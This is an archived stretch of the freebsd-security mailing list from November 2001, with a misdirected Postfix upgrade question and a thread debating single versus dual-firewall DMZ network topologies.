doesn't have per-application control of ports and sockets, which is what ZoneAlarm *tries* to provide. It'd be nice to add this as built-in feature, either in the base OS or in ipfw. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 17: 2:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.50.78]) by hub.freebsd.org (Postfix) with ESMTP id D5C9937B405 for ; Sat, 24 Nov 2001 17:02:12 -0800 (PST) Subject: postfix problem To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Sat, 24 Nov 2001 19:00:08 -0600 X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 11/24/2001 06:53:29 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I just upgraded from 4.3-release to 4.4-release and postfix 20010228 will not start, it complains about the qmgr not running. Any ideas ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 17:38:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by hub.freebsd.org (Postfix) with SMTP id 6ED7937B417 for ; Sat, 24 Nov 2001 17:38:12 -0800 (PST) Message-ID: <20011125013812.9839.qmail@web10106.mail.yahoo.com> Received: from [138.88.33.232] by web10106.mail.yahoo.com via HTTP; Sat, 24 Nov 2001 17:38:12 PST Date: Sat, 24 Nov 2001 17:38:12 -0800 (PST) From: G Brehm Subject: Re: Best security topology for FreeBSD To: cjclark@alum.mit.edu Cc: security@FreeBSD.ORG In-Reply-To: <20011122031739.A226@gohan.cjclark.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > It is sad to see this poor design, > > Internet > | > | > Firewall--"DMZ" > | > | > Internal > > Used so very, very much these days (I think thanks > to several firewall > vendors pushing this as a standard design). > > A much better design, is > > Internet > | > | > Firewall1 > | > | > DMZ > | > | > Firewall2 > | > | > Internal > > (This design is actually where the term "DMZ" comes > from since it > actually looks like one here.) > > And in your case... that many NICs in one machine... > I hope you have a > dedicated stand-by. It's screaming "single point of > failure." I would > really consider NOT using one machine for all of > this. > -- > Crist J. Clark > cjclark@alum.mit.edu Sir, I have only setup a couple firewalls in my day. I have learned much from your posts in the past. I am confused by your bias. You'd think if it was firewall OEM pushing one design it would go for your preferered, (twice the $). I don't even want to think about a 10 NIC system, but talking 3 or 4 what is so bad with the first choice? ===== - i believe in dogs __________________________________________________ Do You Yahoo!? Yahoo! GeoCities - quick and easy web site hosting, just $8.95/month. http://geocities.yahoo.com/ps/info1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 18: 7: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id AF29E37B416 for ; Sat, 24 Nov 2001 18:06:57 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 30D1766B27; Sat, 24 Nov 2001 18:06:57 -0800 (PST) Date: Sat, 24 Nov 2001 18:06:56 -0800 From: Kris Kennaway To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: postfix problem Message-ID: <20011124180656.A83390@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="+HP7ph2BbKc20aGI" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Sat, Nov 24, 2001 at 07:00:08PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --+HP7ph2BbKc20aGI Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Nov 24, 2001 at 07:00:08PM -0600, George.Giles@mcmail.vanderbilt.ed= u wrote: > I just upgraded from 4.3-release to 4.4-release and postfix 20010228 will > not start, it complains about the qmgr not running. >=20 > Any ideas ? This is not a security-related question. Please do not abuse the mailing lists, and ask your general support questions on questions@freebsd.org. Thanks. Kris --+HP7ph2BbKc20aGI Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8AFJAWry0BWjoQKURAia0AKD/L94wedK04ibHmacuNw88G44l4wCgigOa gT8bLnqX4u5ovGiy7/Szdxs= =PCP6 -----END PGP SIGNATURE----- --+HP7ph2BbKc20aGI-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 18:25: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from home.24cl.com (121.113.sn.ct.dsl.thebiz.net [216.238.113.121]) by hub.freebsd.org (Postfix) with ESMTP id 8586937B405 for ; Sat, 24 Nov 2001 18:24:59 -0800 (PST) Received: from bloat (unknown [192.168.0.33]) by home.24cl.com (Postfix) with ESMTP id CD4B281E22; Sat, 24 Nov 2001 21:24:56 -0500 (EST) Message-ID: <200111242124560932.023F3386@home.24cl.com> In-Reply-To: <20011125013812.9839.qmail@web10106.mail.yahoo.com> References: <20011125013812.9839.qmail@web10106.mail.yahoo.com> X-Mailer: Calypso Version 3.20.01.01 (4) Date: Sat, 24 Nov 2001 21:24:56 -0500 Reply-To: myraq@mgm51.com From: "MikeM" To: "G Brehm" , cjclark@alum.mit.edu Cc: security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 11/24/2001 at 5:38 PM G Brehm wrote: |> |> It is sad to see this poor design, |> |> Internet |> | |> | |> Firewall--"DMZ" |> | |> | |> Internal |> |> Used so very, very much these days (I think thanks |> to several firewall |> vendors pushing this as a standard design). |> |> A much better design, is |> |> Internet |> | |> | |> Firewall1 |> | |> | |> DMZ |> | |> | |> Firewall2 |> | |> | |> Internal |> |> (This design is actually where the term "DMZ" comes |> from since it |> actually looks like one here.) =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D I'm not sure I agree with your comments. Yes, your architecture is more= akin to the origin of the term "DMZ", but is that the real functionality= that we want to provide? Should we be more concerned with staying within= the strict definition of the military term "DMZ" or should our firewalls= provide the needed function? In my "DMX", the server only sees port 80 traffic. *only port 80* I= cannot possibly provide that functionality with your strict interpretation= of a DMZ firewall. Given the options of tossing aside your strict= definition of DMZ of re-architecturing my firewall, I think I'd vote for= tossing aside your definition. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message